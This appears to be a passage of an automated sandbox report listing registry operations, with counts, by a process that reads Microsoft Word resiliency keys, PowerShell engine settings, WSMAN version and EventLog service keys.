| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
7 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | - |
|
12 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems | - |
|
24 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency | - |
|
40 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word | - |
|
40 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0 | - |
|
40 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
40 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft | - |
|
37 | |
| Open Key | HKEY_CURRENT_USER\Software | - |
|
28 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft | value_name = mq*, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft | value_name = |5,, type = REG_BINARY |
|
2 | |
| Read Value | - | value_name = mq*, type = REG_BINARY |
|
2 | |
| Read Value | - | value_name = |5,, type = REG_BINARY |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
12 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft | - |
|
1 | |
